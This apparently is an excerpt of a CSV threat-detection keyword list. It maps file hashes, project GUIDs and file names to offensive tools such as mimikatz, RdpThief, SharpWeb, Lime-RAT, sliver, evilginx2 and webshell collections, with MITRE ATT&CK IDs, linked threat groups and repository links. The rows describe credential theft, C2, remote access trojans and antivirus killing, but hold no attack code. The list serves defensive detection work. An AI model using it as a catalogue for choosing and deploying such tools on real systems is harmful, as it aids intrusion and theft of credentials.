"*ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5*",".{0,1000}ae2bed75480f578573b7cdb5e7c48cbbaf6012171eb4d9faf9d147aa8ea793e5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33527"
"*ae2f9496b86befa082d8d2c4b714c1ace7399401356e1d9502b3a498d92f2bbc*",".{0,1000}ae2f9496b86befa082d8d2c4b714c1ace7399401356e1d9502b3a498d92f2bbc.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","33528"
"*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","33529"
"*ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430*",".{0,1000}ae320a69dd18e08c9cfb026f247978522ffde2acddeff93a5406c9b584dbc430.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#filehash","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","33530"
"*ae350439aa4332fe5d7ed69a210d1ec0362ea147b9326d49730e18054e7e7c03*",".{0,1000}ae350439aa4332fe5d7ed69a210d1ec0362ea147b9326d49730e18054e7e7c03.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33532"
"*ae35923152fc85dc696a1af8f5715091b5ede761fac61fc5e89f84a2f727b21d*",".{0,1000}ae35923152fc85dc696a1af8f5715091b5ede761fac61fc5e89f84a2f727b21d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","33533"
"*AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363*",".{0,1000}AE373FC4409EDA1B5F41D5CE3CA9290B3C7E8363.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","0","#P2P","N/A","10","","N/A","","","","33534"
"*ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699*",".{0,1000}ae382881d2f7597e84f993113650077b0bda039fbead9b2ef11eeca48ca33699.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33536"
"*ae3fe47fea3540fa053326f19d7ac8198d170efea7551438d2e3deae3381f49f*",".{0,1000}ae3fe47fea3540fa053326f19d7ac8198d170efea7551438d2e3deae3381f49f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","33538"
"*ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12*",".{0,1000}ae4109ba21693d9f9eb2623be9df5a5c68d3286dff7c8eb27d0e64889ce24c12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33539"
"*ae4ef59bce3e71393264a4cedbeb40bcfeb518740048bf4b619fad20f24adb5a*",".{0,1000}ae4ef59bce3e71393264a4cedbeb40bcfeb518740048bf4b619fad20f24adb5a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33546"
"*ae6e3c9ec1127ef2957da29ae7394f77c043ff7d1d80b92d02a9f9bb40323ad4*",".{0,1000}ae6e3c9ec1127ef2957da29ae7394f77c043ff7d1d80b92d02a9f9bb40323ad4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33549"
"*ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722*",".{0,1000}ae832b7ffb1e0d22120b433665d797d491e626506fe3b839afe3d5fec8fa6722.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33551"
"*ae84192b77cec541a088d563dc5f20723123e096*",".{0,1000}ae84192b77cec541a088d563dc5f20723123e096.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","33552"
"*AE844C23-294E-4690-8CF3-2E5F9769D8E0*",".{0,1000}AE844C23\-294E\-4690\-8CF3\-2E5F9769D8E0.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#GUIDproject","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","33553"
"*ae85963af2849bb420e8b9d1e0d7f2194bf07d9b0d4a85fce7e5c40651626adc*",".{0,1000}ae85963af2849bb420e8b9d1e0d7f2194bf07d9b0d4a85fce7e5c40651626adc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33554"
"*ae866775c318b21e13caa37dbfd2b96c03de3ba73522f437c14cc5844270c415*",".{0,1000}ae866775c318b21e13caa37dbfd2b96c03de3ba73522f437c14cc5844270c415.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","33555"
"*ae8abf10e555cee9769abea0e2d3379b11bc6a817f75a0b6038d294fa3d6a136*",".{0,1000}ae8abf10e555cee9769abea0e2d3379b11bc6a817f75a0b6038d294fa3d6a136.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","33556"
"*ae8dc27ab20f07935522d714f2015e0f978ff982ed2e6f1441ca14d2bf286c92*",".{0,1000}ae8dc27ab20f07935522d714f2015e0f978ff982ed2e6f1441ca14d2bf286c92.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33557"
"*ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102*",".{0,1000}ae8edae460f24e270ff7a2ce2d3b7b126b943f086c5d009ece13fdebd64d5102.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33558"
"*ae901f6fbb7b13b31dadf4a360838cf9e795e819e2658ce13ba927734f49da73*",".{0,1000}ae901f6fbb7b13b31dadf4a360838cf9e795e819e2658ce13ba927734f49da73.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33559"
"*ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079*",".{0,1000}ae96f988b56a4ae501aa125e99d11308714290e287a21f97a4116b2bd9964079.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33560"
"*ae9c79299cf29b1c11d7d0517e158410e15306405bbf1c981305683454247845*",".{0,1000}ae9c79299cf29b1c11d7d0517e158410e15306405bbf1c981305683454247845.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33561"
"*aea165d63fd5898c5c31644fa051f804d35abf92ed3ee340429f22a112ab6ec0*",".{0,1000}aea165d63fd5898c5c31644fa051f804d35abf92ed3ee340429f22a112ab6ec0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33562"
"*aeachknmefphepccionboohckonoeemg*",".{0,1000}aeachknmefphepccionboohckonoeemg.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33567"
"*aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03*",".{0,1000}aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","33568"
"*aebea2e78c57a1d2e961e1d4bf534be7de985c64a36801d292512be7ee70c3c7*",".{0,1000}aebea2e78c57a1d2e961e1d4bf534be7de985c64a36801d292512be7ee70c3c7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33569"
"*AEC0EBBA-3BE4-4B5C-8F5C-0BB8DDDA7148*",".{0,1000}AEC0EBBA\-3BE4\-4B5C\-8F5C\-0BB8DDDA7148.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","33571"
"*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#GUIDproject","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","33572"
"*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33573"
"*aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69*",".{0,1000}aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","33574"
"*aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52*",".{0,1000}aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33579"
"*aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64*",".{0,1000}aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33580"
"*aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09*",".{0,1000}aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","33582"
"*aeebe34b285a98fe37de5b3128ea9e302b9feef62ca1b5a85fa41208e328433d*",".{0,1000}aeebe34b285a98fe37de5b3128ea9e302b9feef62ca1b5a85fa41208e328433d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33583"
"*aeec0f065823849ebb2ded6654d59526ee8b73520117bd033a19e011c9455248*",".{0,1000}aeec0f065823849ebb2ded6654d59526ee8b73520117bd033a19e011c9455248.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","33584"
"*aeed8e92b0e9d7e4c9602476183d611ed9aa2db760e349eb6226dcadb2b0df80*",".{0,1000}aeed8e92b0e9d7e4c9602476183d611ed9aa2db760e349eb6226dcadb2b0df80.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","33585"
"*aef6547e-3822-4f96-9708-bcf008129b2b*",".{0,1000}aef6547e\-3822\-4f96\-9708\-bcf008129b2b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33586"
"*aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623*",".{0,1000}aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","33587"
"*aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623*",".{0,1000}aef6ce3014add838cf676b57957d630cd2bb15b0c9193cf349bcffecddbc3623.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","33588"
"*aefa7d3dbf23503f8bfb9c31c922e735977d1101fa52e71502ff65e67f8f07ae*",".{0,1000}aefa7d3dbf23503f8bfb9c31c922e735977d1101fa52e71502ff65e67f8f07ae.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33589"
"*Aegrah/PANIX*",".{0,1000}Aegrah\/PANIX.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33591"
"*aem2john.py*",".{0,1000}aem2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33592"
